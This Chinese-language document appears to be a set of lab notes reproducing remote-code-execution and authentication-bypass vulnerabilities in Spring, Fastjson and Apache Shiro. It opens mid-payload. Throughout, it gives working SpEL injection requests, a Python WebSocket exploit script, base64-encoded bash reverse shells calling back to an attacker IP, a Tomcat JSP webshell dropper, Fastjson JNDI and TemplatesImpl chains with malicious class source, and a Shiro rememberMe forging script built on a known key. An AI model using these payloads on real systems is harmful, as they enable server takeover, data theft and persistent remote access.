ng(86)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(51)).concat(T(java.lang.Character).toString(82)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(56)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(79)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(73)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(81)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(69)).concat(T(java.lang.Character).toString(48)).concat(T(java.lang.Character).toString(78)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(56)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(78)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(49)).concat(T(java.lang.Character).toString(73)).concat(T(java.lang.Character).toString(68)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(43)).concat(T(java.lang.Character).toString(74)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(69)).concat(T(java.lang.Character).toString(61)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(54)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(125)))} 替換response_type值發包

反彈shell成功

Spring WebFlow遠程代碼執行（CVE-2017-4971）

Spring WebFlow 是一個適用於開發基於流程的應用程序的框架（如購物邏輯），可以將流程的定義和實現流程行爲的類和視圖分離開來。在其 2.4.x 版本中，如果我們控制了數據綁定時的field，將導致一個SpEL表達式注入漏洞，最終造成任意命令執行。 影響版本 Spring WebFlow 2.4.0 - 2.4.4 http://192.168.48.133:8080/hotels/1

這裏有默認的賬號密碼

登陸後

點擊confirm抓包

漏洞觸發點在這裏 payload構造 &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.48.144/6665+0>%261")).start()=vulhub

反彈shell成功

Spring Data Rest 遠程命令執行漏洞復現(CVE-2017-8046)

漏洞原理 Spring-data-rest服務器在處理PATCH請求時，攻擊者可以構造惡意的PATCH請求併發送給spring-date-rest服務器，通過構造好的JSON數據來執行任意Java代碼

payload 其中數字的構造 payload = b'touch /tmp/success' bytecode = ','.join(str(i) for i in list(payload)) print(bytecode)

PATCH/customers/1HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/json-patch+json Content-Length: 202

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]

反彈shell bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ4LjE0NC82NjY1IDA+JjE=}|{base64,-d}|{bash,-i} 98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,81,52,76,106,69,48,78,67,56,50,78,106,89,49,73,68,65,43,74,106,69,61,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125 記得修改Content-Type: application/json-patch+json

反彈shell成功

Spring CVE-2018-1270

影響版本 Spring Framework 5.0 to 5.0.4 Spring Framework 4.3 to 4.3.14 EXP利用

#!/usr/bin/env python3 import requests import random import string import time import threading import logging import sys import json

logging.basicConfig(stream=sys.stdout, level=logging.INFO)

def random_str(length): letters = string.ascii_lowercase + string.digits return ''.join(random.choice(letters) for c in range(length))

class SockJS(threading.Thread): def init(self, url, _args, **kwargs): super().init(_args, _*kwargs) self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}' self.daemon = True self.session = requests.session() self.session.headers = { 'Referer': url, 'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)' } self.t = int(time.time()_1000)

def run(self): url = f'{self.base}/htmlfile?c=_jp.vulhub' response = self.session.get(url, stream=True) for line in response.iter_lines(): time.sleep(0.5)

def send(self, command, headers, body=''): data = [command.upper(), '\n']

data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()]))

data.append('\n\n') data.append(body) data.append('\x00') data = json.dumps([''.join(data)])

response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data) if response.status_code != 204: logging.info(f"send '{command}' data error.") else: logging.info(f"send '{command}' data success.")

def del(self): self.session.close()

sockjs = SockJS('http://你的靶機IP:8080/gs-guide-websocket') sockjs.start() time.sleep(1)

sockjs.send('connect', { 'accept-version': '1.1,1.0', 'heart-beat': '10000,10000' }) sockjs.send('subscribe', { 'selector': 'T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/你的kaliIP/kali監聽端口;cat <&5 | while read line; do $line 2>&5 >&5; done"})', 'id': 'sub-0', 'destination': '/topic/greetings' })

data = json.dumps({'name': 'vulhub'}) sockjs.send('send', { 'content-length': len(data), 'destination': '/app/hello' }, data)

反彈shell成功

Spring Data Commons RCE漏洞（CVE-2018-1273）

Spring Data是一個用於簡化數據庫訪問，並支持雲服務的開源框架，Spring Data Commons是Spring Data下所有子項目共享的基礎框架。Spring Data Commons 在2.0.5及以前版本中，存在一處SpEL表達式注入漏洞，攻擊者可以注入惡意SpEL表達式以執行任意命令 python3 SpringBoot-Scan.py -v "http://192.168.48.133:8080/"

POST /users?page=&size=5 HTTP/1.1 Host: 192.168.48.133:8080 Connection: keep-alive Content-Length: 129 Pragma: no-cache Cache-Control: no-cache Origin: http://192.168.48.133:8080 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8 Referer: http://192.168.48.133:8080/users?page=0&size=5 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch whoami.sh")]=&password=&123repeatedPassword=123

python啓動http.server python -m http.server 8888

bash -i >& /dev/tcp/192.168.48.144/6665 0>&1

payload username#this.getClass().forName("java.lang.Runtime").getRuntime().exec('wget [http://192.168.48.144:8888/whoami6.sh')]=&password=&123repeatedPassword=123]=&password=&123repeatedPassword=123) 這裏bash反彈成功了 ./執行未成功

Spring Cloud Gateway遠程代碼執行漏洞（CVE-2022-22947）

漏洞說明 2022年3月1日，VMware官方發佈漏洞報告，在使用Spring Colud Gateway的應用程序開啓、暴露Gateway Actuator端點時，會容易造成代碼注入攻擊，攻擊者可以製造惡意請求，在遠程主機進行任意遠程執行。 影響版本

• Spring Cloud Gateway 3.1.x < 3.1.1

• Spring Cloud Gateway 3.0.x < 3.0.7

• 舊的、不受支持的版本也會受到影響

python3 SpringBoot-Scan.py -v "http://192.168.48.133:8080/"

POST /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.48.133:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/json Content-Length: 310

{ "id": "hacktest", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"id"}).getInputStream()))}" } }], "uri": "http://example.com" }

發送如下數據包觸發表達式執行

POST /actuator/gateway/refresh HTTP/1.1 Host: 192.168.48.133:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0

GET /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.48.133:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close

發送如上數據包查看結果

Spring Cloud Function SpEL RCE漏洞（CVE-2022-22963）

漏洞說明 2022年3月，Spring Cloud 官方修復了一個 Spring Cloud Function中的 SPEL 表達式注入漏洞，由於 Spring Cloud Function中 RoutingFunction 類的 apply 方法將請求頭中的 “spring.cloud.function.routing-expression” 參數作爲SpEL表達式進行處理，造成了SpEL表達式注入漏洞，攻擊者可利用該漏洞遠程執行任意代碼。 漏洞利用 手工復現

POST /functionRouter HTTP/1.1 Host: 192.168.68.168:8080 Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ4LjE0NC82NjY1IDA+JjE=}|{base64,-d}|{bash,-i}") Content-Type: text/plain Content-Length: 6

Test

Spring Core RCE漏洞（CVE-2022-22965）

漏洞說明 Spring framework 是Spring 裏面的一個基礎開源框架，其目的是用於簡化 Java 企業級應用的開發難度和開發週期,2022年3月31日，VMware Tanzu發佈漏洞報告，Spring Framework存在遠程代碼執行漏洞，在 JDK 9+ 上運行的 Spring MVC 或 Spring WebFlux 應用程序可能容易受到通過數據綁定的遠程代碼執行 (RCE) 的攻擊。

/tomcatwar.jsp?pwd=aabysszg&cmd=whoami

手工復現 GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1 Host: 192.168.48.133:8080 Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close suffix: %>// c1: Runtime c2: <% DNT: 1 Content-Length: 2 http://192.168.48.133:8080/tomcatwar.jsp?pwd=j&cmd=id

Spring Security 身份認證繞過漏洞 (CVE-2022-22978)

漏洞說明 當SpringSecurity中使用RegexRequestMatcher進行權限配置，且規則中使用帶點號的正則表達式時，未經授權的遠程攻擊者可通過構造惡意數據包繞過身份認證，導致配置的權限驗證失效

/admin/%0dtest

/admin/%0atest

spring漏洞總結 spring框架存在敏感信息泄露漏洞，headdump泄露可能回泄露數據庫密碼等敏感數據，同時有許多的spel表達式注入漏洞，可以導致遠程命令執行，還有身份認證繞過漏洞

Fastjson

什麼是fastjson?

fastjson 是一個 有阿里開發的一個開源Java 類庫，可以將 Java 對象轉換爲 JSON 格式(序列化)，當然它也可以將 JSON 字符串轉換爲 Java 對象（反序列化）。Fastjson 可以操作任何 Java 對象，即使是一些預先存在的沒有源碼的對象

fastjson反序列化漏洞原理

fastjson在解析json的過程中，支持使用autoType來實例化某一個具體的類，並調用該類的set/get方法來訪問屬性。通過查找代碼中相關的方法，即可構造出一些惡意利用鏈。 fastjson漏洞利用過程 編譯一個惡意類，啓動RMI服務，構造fastjson payload加載遠程類，達到命令執行的目的。 漏洞復現 首先要配置好 marshalsec.jar 該工具是java反序列化工具，可以快速開啓RMI和LDAP服務 mvn編譯，建議環境JAVA1.8，maven3.6+ proxychains4 git clone https://github.com/mbechler/marshalsec.git mvn clean package -DskipTests

import java.lang.Runtime; ​ import java.lang.Process; ​ public class test{ ​ static { ​ try { ​ Runtime rt = Runtime.getRuntime(); ​ String[] commands = { "/bin/sh", "-c", "ping user.`whoami`.ivg4na.dnslog.cn"}; ​ Process pc = rt.exec(commands); ​ pc.waitFor(); ​ } catch (Exception e) { ​ ​ } ​ } ​ }

javac test.java yakit啓動dnslog

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.48.144:9999/#test" 6666

整體流程 1@type 指向com.sun.rowset.JdbcRowSetImpl類 該類其中有個dataSourceName方法支持傳入一個rmi的源，只要解析其中的url就會支持遠程調用

2遠程訪問我們啓動的rmi服務器，rmi服務器請求加載遠程服務器的class，這個class就是我們提前編譯上傳到服務器的惡意class

3.rmi將遠程加載得到的class返回給靶機服務器，靶機服務器執行代碼

反彈shell的利用 這裏利用JNDI工具 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ4LjE0NC82NjY1IDA+JjE=}|{base64,-d}|{bash,-i} -C爲命令 -A爲攻擊機IP java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ4LjE0NC82NjY1IDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.48.144"

這裏用JDK1.7的成功打通，反彈shell rmi://192.168.48.144:1099/g8gp2e

fastjson不出網打法利用

fastjson不出網的話我們就沒有辦法利用這個rmi服務進行遠程加載惡意類了 本地搭建環境 TemplatesImpl打法 利用條件苛刻 服務端使用parseObject時，必須使用如下格式才能觸發漏洞 JSON.parseObject(input, Object.class, Feature.SupportNonPublicField) 服務端使用parse()時，需要JSON.parse(text1,Feature.SupportNonPublicField)

<dependencies> <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.24</version> </dependency> </dependencies>

Templateslmplcmd.Java

import com.sun.org.apache.xalan.internal.xsltc.DOM; import com.sun.org.apache.xalan.internal.xsltc.TransletException; import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class Templateslmplcmd extends AbstractTranslet { public Templateslmplcmd() throws Exception { Runtime.getRuntime().exec("calc"); } @Override public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) { } @Override public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] handlers) throws TransletException { } }

import java.io.*; import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.parser.Feature; import java.util.Base64;

public class test01 { public static void main(String[] args) throws Exception { FileInputStream inputFromFile = new FileInputStream("E:\\JAVASEC\\test02\\src\\main\\java\\Templateslmplcmd.class"); byte[] bs = new byte[inputFromFile.available()]; inputFromFile.read(bs); String encodedBytes = Base64.getEncoder().encodeToString(bs); //<=1.2.24 String payload = "{\r\n" + " \"a\": {\r\n" + " \"@type\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\", \r\n" + " \"_bytecodes\": [\r\n" + " \""+encodedBytes+"\"\r\n" + " ], \r\n" + " \"_name\": \"aaa\", \r\n" + " \"_tfactory\": { }, \r\n" + " \"_outputProperties\": { }\r\n" + " }\r\n" + "}"; //<1.2.48 // payload = "{\r\n" // + " \"a\": {\r\n" // + " \"@type\": \"java.lang.Class\", \r\n" // + " \"val\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"\r\n" // + " }, \r\n" // + " \"b\": {\r\n" // + " \"@type\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\", \r\n" // + " \"_bytecodes\": [\r\n" // + " \""+encodedBytes+"\"\r\n" // + " ], \r\n" // + " \"_name\": \"aaa\", \r\n" // + " \"_tfactory\": { }, \r\n" // + " \"_outputProperties\": { }\r\n" // + " }\r\n" // + "}"; System.out.println(payload); JSON.parseObject(payload, Feature.SupportNonPublicField);

}

}

BCEL不出網打法 C3P0二次反序列化打法 等等可參考https://github.com/lemono0/FastJsonParty/blob/main/Fastjson%E5%85%A8%E7%89%88%E6%9C%AC%E6%A3%80%E6%B5%8B%E5%8F%8A%E5%88%A9%E7%94%A8-Poc.md

shiro

shiro漏洞原理介紹 shiro的特徵的是rememberMe字段 rememberMe字段採用的是AES加密+base64編碼 採用AES加密我們拿到KEY的話就可以解密，服務端會進行base64解碼+AES解密進行反序列化，那麼拿到KEY便可以進行修改rememberMe的值進行反序列化攻擊

shiro-CVE-2016-4437

CVE-2016-4437，影響版本shiro1.24 如果未勾選 Remember me,則只能在返回包裏看見

勾選可看

這裏是先用工具爆破密鑰

手工復現，更容易理解漏洞過程 key如下 kPH+bIxk5D2deZiIxcaaaA== 參考網上公開代碼如下 :::info import uuid import base64 from Crypto.Cipher import AES

def encode_rememberme(): f = open('poc.ser','rb') BS = AES.block_size pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==") iv = uuid.uuid4().bytes encryptor = AES.new(key, AES.MODE_CBC, iv) file_body = pad(f.read()) base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body)) return base64_ciphertext

if name == 'main': payload = encode_rememberme() print("rememberMe={0}".format(payload.decode())) ::: 反彈shell利用 bash -i >& /dev/tcp/192.168.48.144/6668 0>&1 YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ4LjE0NC82NjY4IDA+JjE= java -jar ysoserial-all.jar CommonsBeanutils1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ4LjE0NC82NjY4IDA+JjE=}|{base64,-d}|{bash,-i}" > poc.ser

cookie修改發包

反彈shell成功

shiro-CVE-2020-1957

漏洞描述 使用 Apache Shiro 進行身份驗證、權限控制時，可以精心構造惡意的URL，利用Apache Shiro 和 Spring Boot 對URL的處理的差異化，可以繞過Apache Shiro 對 Spring Boot 中的 Servlet的權限控制，越權並實現未授權訪問。 漏洞影響版本

• Apache Shiro < 1.5.1

漏洞復現 payload /xxx/..;/admin/ 越權訪問後臺管理系統

shiro baypasswaf

bypasswaf可參考如下文章 http://120.79.21.98:8090/archives/shirobypass

shiro有key無利用鏈子打法

面試遇見過的問題，除了問shiro反序列化漏洞原理有時候也會問到這個點 其實還是有鏈子的，鏈子多的話，通過爆破利用鏈，完成漏洞利用。 環境搭建 docker pull medicean/vulapps:s_shiro_1 docker run -d -p 80:8080 medicean/vulapps:s_shiro_1